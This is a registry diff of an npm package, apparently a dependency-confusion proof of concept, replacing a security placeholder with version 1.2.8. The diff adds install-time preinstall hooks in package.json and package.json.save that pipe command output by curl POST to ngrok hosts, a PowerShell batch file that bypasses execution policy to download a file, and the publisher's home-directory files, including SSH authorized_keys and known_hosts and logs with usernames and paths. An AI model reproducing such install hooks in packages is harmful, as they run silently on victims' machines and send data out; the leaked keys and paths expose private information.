myconfusedfunctionpoctestpackage 0.0.1-security → 1.2.8

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of myconfusedfunctionpoctestpackage might be problematic. Click here for more details.

Files changed (35) hide show
  1. package/.bash_history +388 -0
  2. package/.bash_logout +7 -0
  3. package/.bashrc +117 -0
  4. package/.cache/motd.legal-displayed +0 -0
  5. package/.lesshst +1 -0
  6. package/.npm/_cacache/content-v2/sha512/01/ad/d3577a5957b15a63958f9e877d4079d6273607fbf9b795c563c12c44657bb608fd6e9628f51465d493f1d56fa79d5323487b8a6810f1a9b74c4730b54650 +0 -0
  7. package/.npm/_cacache/content-v2/sha512/02/a7/67a239f1aa658701459b37f650b6c5fcfe353465ea222e2d742254d45e3abcff6cb4e829ba84b212507e1cc512b1f84f82454f8ea2b7b88985236a0cdc4b +0 -0
  8. package/.npm/_cacache/content-v2/sha512/06/c3/3d77d5b1fa34bbc664e3b3d76a565d5fb7a90c07cc324148f9a8e3739f7db6141db6a336c404502d05f8d3e8fc15ba803c2e7f99fac5b01931374823e025 +0 -0
  9. package/.npm/_cacache/content-v2/sha512/30/69/9c09fbd88e91eaa2f440ff3b73d96414b49697f395b4a53a8aae557952ff9d7ab6dc2f72b700aa4f9421186204041f8803d0e95a9ef393306ff8acd1dd9a +0 -0
  10. package/.npm/_cacache/content-v2/sha512/b3/5c/f700f76218917b57660243de7fafabfedad82d4cd3c13947f80b49fdba9c664018c8075134abb2c71362498a7994abcf389ff078921c4b6496813476d139 +0 -0
  11. package/.npm/_cacache/content-v2/sha512/c3/88/51684e75b45a24137035e9ed9a80ebb9e791595215f9403f89e5f04373b41df1a15ba3d3804827d5e3d86ff8fbab597d4fc40533810224ffbab5f4940c47 +0 -0
  12. package/.npm/_cacache/content-v2/sha512/cf/98/ce72aaf878712655672731ae063c486098ca9707f42b0cfc4b4918b935e812613cd748932ed82035ce0be4dda514e691a021bf2d64a6766d0b2d95043579 +0 -0
  13. package/.npm/_cacache/index-v5/ae/c1/794477315825298db9ca27dfd950e963043ec553246545524bbab48a0c70 +8 -0
  14. package/.npm/_logs/2025-02-25T18_15_23_762Z-debug-0.log +38 -0
  15. package/.npm/_logs/2025-02-25T18_15_28_961Z-debug-0.log +80 -0
  16. package/.npm/_logs/2025-02-25T18_23_17_141Z-debug-0.log +38 -0
  17. package/.npm/_logs/2025-02-25T18_24_52_548Z-debug-0.log +80 -0
  18. package/.npm/_logs/2025-02-25T18_34_09_781Z-debug-0.log +82 -0
  19. package/.npm/_logs/2025-02-25T18_47_51_816Z-debug-0.log +83 -0
  20. package/.npm/_logs/2025-02-25T19_44_38_258Z-debug-0.log +84 -0
  21. package/.npm/_logs/2025-02-25T20_15_09_811Z-debug-0.log +85 -0
  22. package/.npm/_logs/2025-02-25T20_17_30_796Z-debug-0.log +86 -0
  23. package/.npm/_logs/2025-02-25T20_27_17_220Z-debug-0.log +87 -0
  24. package/.npm/_logs/2025-02-25T20_44_47_592Z-debug-0.log +35 -0
  25. package/.npm/_update-notifier-last-checked +0 -0
  26. package/.profile +27 -0
  27. package/.ssh/authorized_keys +1 -0
  28. package/.ssh/known_hosts +1 -0
  29. package/.sudo_as_admin_successful +0 -0
  30. package/base.ldif +13 -0
  31. package/exploit.bat +1 -0
  32. package/exploit.txt +26 -0
  33. package/package.json +10 -4
  34. package/package.json.save +12 -0
  35. package/README.md +0 -5
@@ -0,0 +1,87 @@
1
+ 0 verbose cli /usr/bin/node /usr/bin/npm
2
+ 1 info using npm@9.2.0
3
+ 2 info using node@v18.19.1
4
+ 3 timing npm:load:whichnode Completed in 1ms
5
+ 4 timing config:load:defaults Completed in 3ms
6
+ 5 timing config:load:file:/usr/share/nodejs/npm/npmrc Completed in 4ms
7
+ 6 timing config:load:builtin Completed in 4ms
8
+ 7 timing config:load:cli Completed in 3ms
9
+ 8 timing config:load:env Completed in 0ms
10
+ 9 timing config:load:project Completed in 2ms
11
+ 10 timing config:load:file:/home/bigibson/.npmrc Completed in 0ms
12
+ 11 timing config:load:user Completed in 0ms
13
+ 12 timing config:load:file:/etc/npmrc Completed in 0ms
14
+ 13 timing config:load:global Completed in 0ms
15
+ 14 timing config:load:setEnvs Completed in 2ms
16
+ 15 timing config:load Completed in 16ms
17
+ 16 timing npm:load:configload Completed in 16ms
18
+ 17 timing npm:load:mkdirpcache Completed in 0ms
19
+ 18 timing npm:load:mkdirplogs Completed in 1ms
20
+ 19 verbose title npm publish
21
+ 20 verbose argv "publish" "--scope" "public" "--loglevel" "verbose"
22
+ 21 timing npm:load:setTitle Completed in 2ms
23
+ 22 timing config:load:flatten Completed in 6ms
24
+ 23 timing npm:load:display Completed in 11ms
25
+ 24 verbose logfile logs-max:10 dir:/home/bigibson/.npm/_logs/2025-02-25T20_27_17_220Z-
26
+ 25 verbose logfile /home/bigibson/.npm/_logs/2025-02-25T20_27_17_220Z-debug-0.log
27
+ 26 timing npm:load:logFile Completed in 15ms
28
+ 27 timing npm:load:timers Completed in 0ms
29
+ 28 timing npm:load:configScope Completed in 0ms
30
+ 29 timing npm:load Completed in 48ms
31
+ 30 verbose publish [ '.' ]
32
+ 31 timing config:load:flatten Completed in 1ms
33
+ 32 silly logfile start cleaning logs, removing 1 files
34
+ 33 silly logfile done cleaning log files
35
+ 34 timing arborist:ctor Completed in 1ms
36
+ 35 notice
37
+ 36 notice 📦 myconfusedfunctionpoctestpackage@1.2.7
38
+ 37 notice === Tarball Contents ===
39
+ 38 notice 12.2kB .bash_history
40
+ 38 notice 220B .bash_logout
41
+ 38 notice 3.8kB .bashrc
42
+ 38 notice 0B .cache/motd.legal-displayed
43
+ 38 notice 20B .lesshst
44
+ 38 notice 105.3kB .npm/_cacache/content-v2/sha512/02/a7/67a239f1aa658701459b37f650b6c5fcfe353465ea222e2d742254d45e3abcff6cb4e829ba84b212507e1cc512b1f84f82454f8ea2b7b88985236a0cdc4b
45
+ 38 notice 407.9kB .npm/_cacache/content-v2/sha512/06/c3/3d77d5b1fa34bbc664e3b3d76a565d5fb7a90c07cc324148f9a8e3739f7db6141db6a336c404502d05f8d3e8fc15ba803c2e7f99fac5b01931374823e025
46
+ 38 notice 12.2kB .npm/_cacache/content-v2/sha512/30/69/9c09fbd88e91eaa2f440ff3b73d96414b49697f395b4a53a8aae557952ff9d7ab6dc2f72b700aa4f9421186204041f8803d0e95a9ef393306ff8acd1dd9a
47
+ 38 notice 52.4kB .npm/_cacache/content-v2/sha512/b3/5c/f700f76218917b57660243de7fafabfedad82d4cd3c13947f80b49fdba9c664018c8075134abb2c71362498a7994abcf389ff078921c4b6496813476d139
48
+ 38 notice 25.4kB .npm/_cacache/content-v2/sha512/c3/88/51684e75b45a24137035e9ed9a80ebb9e791595215f9403f89e5f04373b41df1a15ba3d3804827d5e3d86ff8fbab597d4fc40533810224ffbab5f4940c47
49
+ 38 notice 210.7kB .npm/_cacache/content-v2/sha512/cf/98/ce72aaf878712655672731ae063c486098ca9707f42b0cfc4b4918b935e812613cd748932ed82035ce0be4dda514e691a021bf2d64a6766d0b2d95043579
50
+ 38 notice 1.4kB .npm/_cacache/index-v5/ae/c1/794477315825298db9ca27dfd950e963043ec553246545524bbab48a0c70
51
+ 38 notice 11.2kB .npm/_logs/2025-02-25T18_14_31_538Z-debug-0.log
52
+ 38 notice 1.7kB .npm/_logs/2025-02-25T18_15_23_762Z-debug-0.log
53
+ 38 notice 4.3kB .npm/_logs/2025-02-25T18_15_28_961Z-debug-0.log
54
+ 38 notice 1.7kB .npm/_logs/2025-02-25T18_23_17_141Z-debug-0.log
55
+ 38 notice 4.3kB .npm/_logs/2025-02-25T18_24_52_548Z-debug-0.log
56
+ 38 notice 7.7kB .npm/_logs/2025-02-25T18_34_09_781Z-debug-0.log
57
+ 38 notice 7.9kB .npm/_logs/2025-02-25T18_47_51_816Z-debug-0.log
58
+ 38 notice 8.0kB .npm/_logs/2025-02-25T19_44_38_258Z-debug-0.log
59
+ 38 notice 8.2kB .npm/_logs/2025-02-25T20_15_09_811Z-debug-0.log
60
+ 38 notice 8.4kB .npm/_logs/2025-02-25T20_17_30_796Z-debug-0.log
61
+ 38 notice 1.7kB .npm/_logs/2025-02-25T20_27_17_220Z-debug-0.log
62
+ 38 notice 0B .npm/_update-notifier-last-checked
63
+ 38 notice 807B .profile
64
+ 38 notice 100B .ssh/authorized_keys
65
+ 38 notice 142B .ssh/known_hosts
66
+ 38 notice 0B .sudo_as_admin_successful
67
+ 38 notice 327B base.ldif
68
+ 38 notice 377B exploit.bat
69
+ 38 notice 3.8kB exploit.txt
70
+ 38 notice 371B package.json
71
+ 38 notice 289B package.json.save
72
+ 39 notice === Tarball Details ===
73
+ 40 notice name: myconfusedfunctionpoctestpackage
74
+ 40 notice version: 1.2.7
75
+ 40 notice filename: myconfusedfunctionpoctestpackage-1.2.7.tgz
76
+ 40 notice package size: 802.0 kB
77
+ 40 notice unpacked size: 902.9 kB
78
+ 40 notice shasum: 1d27eddbef3e2a30e7f431d01310788cb7dfd9c8
79
+ 40 notice integrity: sha512-Aa3TV3pZV7FaY[...]PGpt0xHMLVGUA==
80
+ 40 notice total files: 33
81
+ 41 notice
82
+ 42 notice Publishing to https://registry.npmjs.org/ with tag latest and default access
83
+ 43 http fetch PUT 200 https://registry.npmjs.org/myconfusedfunctionpoctestpackage 1730ms
84
+ 44 timing command:publish Completed in 2150ms
85
+ 45 verbose exit 0
86
+ 46 timing npm Completed in 2225ms
87
+ 47 info ok
@@ -0,0 +1,35 @@
1
+ 0 verbose cli /usr/bin/node /usr/bin/npm
2
+ 1 info using npm@9.2.0
3
+ 2 info using node@v18.19.1
4
+ 3 timing npm:load:whichnode Completed in 0ms
5
+ 4 timing config:load:defaults Completed in 4ms
6
+ 5 timing config:load:file:/usr/share/nodejs/npm/npmrc Completed in 4ms
7
+ 6 timing config:load:builtin Completed in 4ms
8
+ 7 timing config:load:cli Completed in 4ms
9
+ 8 timing config:load:env Completed in 0ms
10
+ 9 timing config:load:project Completed in 2ms
11
+ 10 timing config:load:file:/home/bigibson/.npmrc Completed in 0ms
12
+ 11 timing config:load:user Completed in 1ms
13
+ 12 timing config:load:file:/etc/npmrc Completed in 0ms
14
+ 13 timing config:load:global Completed in 1ms
15
+ 14 timing config:load:setEnvs Completed in 2ms
16
+ 15 timing config:load Completed in 19ms
17
+ 16 timing npm:load:configload Completed in 20ms
18
+ 17 timing npm:load:mkdirpcache Completed in 0ms
19
+ 18 timing npm:load:mkdirplogs Completed in 1ms
20
+ 19 verbose title npm publish
21
+ 20 verbose argv "publish" "--scope" "public" "--loglevel" "verbose"
22
+ 21 timing npm:load:setTitle Completed in 3ms
23
+ 22 timing config:load:flatten Completed in 6ms
24
+ 23 timing npm:load:display Completed in 13ms
25
+ 24 verbose logfile logs-max:10 dir:/home/bigibson/.npm/_logs/2025-02-25T20_44_47_592Z-
26
+ 25 verbose logfile /home/bigibson/.npm/_logs/2025-02-25T20_44_47_592Z-debug-0.log
27
+ 26 timing npm:load:logFile Completed in 14ms
28
+ 27 timing npm:load:timers Completed in 1ms
29
+ 28 timing npm:load:configScope Completed in 0ms
30
+ 29 timing npm:load Completed in 53ms
31
+ 30 verbose publish [ '.' ]
32
+ 31 timing config:load:flatten Completed in 1ms
33
+ 32 silly logfile start cleaning logs, removing 1 files
34
+ 33 silly logfile done cleaning log files
35
+ 34 timing arborist:ctor Completed in 1ms
File without changes
package/.profile ADDED
@@ -0,0 +1,27 @@
1
+ # ~/.profile: executed by the command interpreter for login shells.
2
+ # This file is not read by bash(1), if ~/.bash_profile or ~/.bash_login
3
+ # exists.
4
+ # see /usr/share/doc/bash/examples/startup-files for examples.
5
+ # the files are located in the bash-doc package.
6
+
7
+ # the default umask is set in /etc/profile; for setting the umask
8
+ # for ssh logins, install and configure the libpam-umask package.
9
+ #umask 022
10
+
11
+ # if running bash
12
+ if [ -n "$BASH_VERSION" ]; then
13
+ # include .bashrc if it exists
14
+ if [ -f "$HOME/.bashrc" ]; then
15
+ . "$HOME/.bashrc"
16
+ fi
17
+ fi
18
+
19
+ # set PATH so it includes user's private bin if it exists
20
+ if [ -d "$HOME/bin" ] ; then
21
+ PATH="$HOME/bin:$PATH"
22
+ fi
23
+
24
+ # set PATH so it includes user's private bin if it exists
25
+ if [ -d "$HOME/.local/bin" ] ; then
26
+ PATH="$HOME/.local/bin:$PATH"
27
+ fi
@@ -0,0 +1 @@
1
+ ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPq46DtywGDKH3HEWsTSAHMChzF4JdA12udtwRzMwFRw generated-by-azure
@@ -0,0 +1 @@
1
+ |1|hAkID7hatXT1a6M7ajlyZPpSkF8=|kncqw+21A5d2r+H/VEu2NS/KylU= ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIII/rK32lDm0wteqXPKQZiqRxMQlA2IcT1azYWLHzTMe
File without changes
package/base.ldif ADDED
@@ -0,0 +1,13 @@
1
+ dn: dc=ldap,dc=example,dc=com
2
+ objectClass: top
3
+ objectClass: dcObject
4
+ objectClass: organization
5
+ o: Example LDAP Organization
6
+ dc: ldap
7
+
8
+ dn: cn=admin,ldap,dc=example,dc=com
9
+ objectClass: simpleSecurityObject
10
+ objectClass: organizationalRole
11
+ cn: admin
12
+ description: Directory Administrator
13
+ userPassword: {SSHA}your_encrypted_password
package/exploit.bat ADDED
@@ -0,0 +1 @@
1
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -Command "& { try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://drive.google.com/uc?export=download&id=1dTAN7CRkUj25ViAGpiUCZOCiyjpJGIQP' -OutFile 'C:\Users\ADClient1-Admin\Downloads\exploit.txt' } catch { Write-Error $_ } }"
package/exploit.txt ADDED
@@ -0,0 +1,26 @@
1
+ This file is a "malicious" file
2
+ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣀⡠⢤⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
3
+ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⡴⠟⠃⠀⠀⠙⣄⠀⠀⠀⠀⠀⠀⠀⠀⠀
4
+ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⠋⠀⠀⠀⠀⠀⠀⠘⣆⠀⠀⠀⠀⠀⠀⠀⠀
5
+ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⠾⢛⠒⠀⠀⠀⠀⠀⠀⠀⢸⡆⠀⠀⠀⠀⠀⠀⠀
6
+ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣶⣄⡈⠓⢄⠠⡀⠀⠀⠀⣄⣷⠀⠀⠀⠀⠀⠀⠀
7
+ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣿⣷⠀⠈⠱⡄⠑⣌⠆⠀⠀⡜⢻⠀⠀⠀⠀⠀⠀⠀
8
+ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⡿⠳⡆⠐⢿⣆⠈⢿⠀⠀⡇⠘⡆⠀⠀⠀⠀⠀⠀
9
+ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢿⣿⣷⡇⠀⠀⠈⢆⠈⠆⢸⠀⠀⢣⠀⠀⠀⠀⠀⠀
10
+ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⣿⣿⣿⣧⠀⠀⠈⢂⠀⡇⠀⠀⢨⠓⣄⠀⠀⠀⠀
11
+ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣸⣿⣿⣿⣦⣤⠖⡏⡸⠀⣀⡴⠋⠀⠈⠢⡀⠀⠀
12
+ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⣾⠁⣹⣿⣿⣿⣷⣾⠽⠖⠊⢹⣀⠄⠀⠀⠀⠈⢣⡀
13
+ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡟⣇⣰⢫⢻⢉⠉⠀⣿⡆⠀⠀⡸⡏⠀⠀⠀⠀⠀⠀⢇
14
+ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢨⡇⡇⠈⢸⢸⢸⠀⠀⡇⡇⠀⠀⠁⠻⡄⡠⠂⠀⠀⠀⠘
15
+ ⢤⣄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⠛⠓⡇⠀⠸⡆⢸⠀⢠⣿⠀⠀⠀⠀⣰⣿⣵⡆⠀⠀⠀⠀
16
+ ⠈⢻⣷⣦⣀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⡿⣦⣀⡇⠀⢧⡇⠀⠀⢺⡟⠀⠀⠀⢰⠉⣰⠟⠊⣠⠂⠀⡸
17
+ ⠀⠀⢻⣿⣿⣷⣦⣀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⢧⡙⠺⠿⡇⠀⠘⠇⠀⠀⢸⣧⠀⠀⢠⠃⣾⣌⠉⠩⠭⠍⣉⡇
18
+ ⠀⠀⠀⠻⣿⣿⣿⣿⣿⣦⣀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⣞⣋⠀⠈⠀⡳⣧⠀⠀⠀⠀⠀⢸⡏⠀⠀⡞⢰⠉⠉⠉⠉⠉⠓⢻⠃
19
+ ⠀⠀⠀⠀⠹⣿⣿⣿⣿⣿⣿⣷⡄⠀⠀⢀⣀⠠⠤⣤⣤⠤⠞⠓⢠⠈⡆⠀⢣⣸⣾⠆⠀⠀⠀⠀⠀⢀⣀⡼⠁⡿⠈⣉⣉⣒⡒⠢⡼⠀
20
+ ⠀⠀⠀⠀⠀⠘⣿⣿⣿⣿⣿⣿⣿⣎⣽⣶⣤⡶⢋⣤⠃⣠⡦⢀⡼⢦⣾⡤⠚⣟⣁⣀⣀⣀⣀⠀⣀⣈⣀⣠⣾⣅⠀⠑⠂⠤⠌⣩⡇⠀
21
+ ⠀⠀⠀⠀⠀⠀⠘⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡁⣺⢁⣞⣉⡴⠟⡀⠀⠀⠀⠁⠸⡅⠀⠈⢷⠈⠏⠙⠀⢹⡛⠀⢉⠀⠀⠀⣀⣀⣼⡇⠀
22
+ ⠀⠀⠀⠀⠀⠀⠀⠀⠈⠻⣿⣿⣿⣿⣿⣿⣿⣿⣽⣿⡟⢡⠖⣡⡴⠂⣀⣀⣀⣰⣁⣀⣀⣸⠀⠀⠀⠀⠈⠁⠀⠀⠈⠀⣠⠜⠋⣠⠁⠀
23
+ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠙⢿⣿⣿⣿⡟⢿⣿⣿⣷⡟⢋⣥⣖⣉⠀⠈⢁⡀⠤⠚⠿⣷⡦⢀⣠⣀⠢⣄⣀⡠⠔⠋⠁⠀⣼⠃⠀⠀
24
+ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠻⣿⣿⡄⠈⠻⣿⣿⢿⣛⣩⠤⠒⠉⠁⠀⠀⠀⠀⠀⠉⠒⢤⡀⠉⠁⠀⠀⠀⠀⠀⢀⡿⠀⠀⠀
25
+ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠙⢿⣤⣤⠴⠟⠋⠉⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠑⠤⠀⠀⠀⠀⠀⢩⠇⠀⠀⠀
26
+ ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
package/package.json CHANGED
@@ -1,6 +1,12 @@
1
1
  {
2
- "name": "myconfusedfunctionpoctestpackage",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
2
+ "name": "myconfusedfunctionpoctestpackage",
3
+ "version": "1.2.8",
4
+ "description": "poc",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "echo 'testa'",
8
+ "preinstall": "ping -c 1 10.138.0.43 | curl -X POST -H 'Content-Type: application/x-www-form-urlencoded' --data-urlencode @- https://9beb-34-168-173-48.ngrok-free.app"
9
+ },
10
+ "author": "me",
11
+ "license": "ISC"
6
12
  }
@@ -0,0 +1,12 @@
1
+ {
2
+ "name": "mygcpconfusedfunctionpocmaliciouspackage",
3
+ "version": "1.1.1",
4
+ "description": "poc",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "echo 'testa'",
8
+ "preinstall": "echo 'hello world'|jq -sRr|curl -X POST https://d2b8-34-168-173-48.ngrok-free.app"
9
+ },
10
+ "author": "me",
11
+ "license": "ISC"
12
+ }
package/README.md DELETED
@@ -1,5 +0,0 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=myconfusedfunctionpoctestpackage for more information.